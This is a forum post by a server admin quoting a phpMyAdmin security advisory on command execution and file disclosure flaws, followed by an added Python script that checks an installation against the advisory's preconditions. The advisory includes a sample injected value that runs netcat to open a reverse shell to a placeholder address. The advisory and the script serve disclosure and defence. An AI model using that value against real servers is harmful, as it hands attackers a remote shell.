I closely watch VulnWatch for anything exploitable on any of the servers I admin. I noticed that phpMyAdmin popped up today.

Technical details :
===================
Command execution :
- bug introduced in 2.6.0-pl2
- attacker does *not* need access to the phpMyAdmin interface
- PHP safe mode must be off
- external transformations must be activated
- sample of offensive value : F';nc -e /bin/sh $IP 80;echo 'A

File disclosure :
- attacker needs access to the phpMyAdmin interface
- PHP safe mode must be off
- $cfg['UploadDir'] must be defined
- exploitation is done via 'sql_localfile'

Vendor Response :
=================
After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.

Recommendation :
================
Upgrade to 2.6.1-rc1 or newer.
Deactivate uploads and transformations if possible.

Is phpMyAdmin something that updates with our cPanel? I notice that my version is actually exploitable according to a version check.
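
An added example (not part of the original post or the advisory): a Python check of the advisory's stated preconditions against one installation. The function names, the suffix ordering and the sample config are assumptions constructed for illustration, and whether external transformations are activated is not inspected.

```python
import re

# Assumed suffix ordering: alpha/beta/rc builds precede the plain release, -plN follows it.
_STAGE = {"alpha": -3, "beta": -2, "rc": -1, "": 0, "pl": 1}
_VER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(alpha|beta|rc|pl)(\d*))?$")

def version_key(version):
    """Turn e.g. '2.6.0-pl2' into a tuple that sorts in release order."""
    m = _VER.match(version.strip().lower())
    if not m:
        raise ValueError("unrecognised version string: %r" % version)
    major, minor, patch, stage, n = m.groups()
    return (int(major), int(minor), int(patch), _STAGE[stage or ""], int(n or 0))

FIXED = version_key("2.6.1-rc1")            # fix release named in the advisory
CMD_EXEC_INTRODUCED = version_key("2.6.0-pl2")  # where the advisory says the bug began

# Matches active assignments only; lines starting with // or # are skipped.
_UPLOAD_DIR = re.compile(
    r"""^\s*\$cfg\[\s*['"]UploadDir['"]\s*\]\s*=\s*(['"])(.*?)\1\s*;""", re.M)

def upload_dir(config_text):
    """Return the last active $cfg['UploadDir'] value, or '' if unset."""
    values = [m.group(2) for m in _UPLOAD_DIR.finditer(config_text)]
    return values[-1] if values else ""

def audit(version, config_text, safe_mode_on):
    """List the advisory's issues whose checkable preconditions are still met."""
    key = version_key(version)
    findings = []
    if key >= FIXED or safe_mode_on:  # both issues need safe mode off
        return findings
    if key >= CMD_EXEC_INTRODUCED:
        findings.append("command execution: exposed if external transformations are activated")
    if upload_dir(config_text):
        findings.append("file disclosure: $cfg['UploadDir'] is defined")
    return findings

# Constructed sample of a config.inc.php fragment, not taken from a real host.
SAMPLE_CONFIG = """<?php
//$cfg['UploadDir'] = '/old/path';
$cfg['UploadDir'] = './upload';
"""

if __name__ == "__main__":
    for v in ("2.6.0-pl1", "2.6.0-pl3", "2.6.1-rc1"):
        print(v, audit(v, SAMPLE_CONFIG, safe_mode_on=False))
```

An empty result means the checked preconditions are not met; upgrading to 2.6.1-rc1 or newer remains the advisory's recommendation.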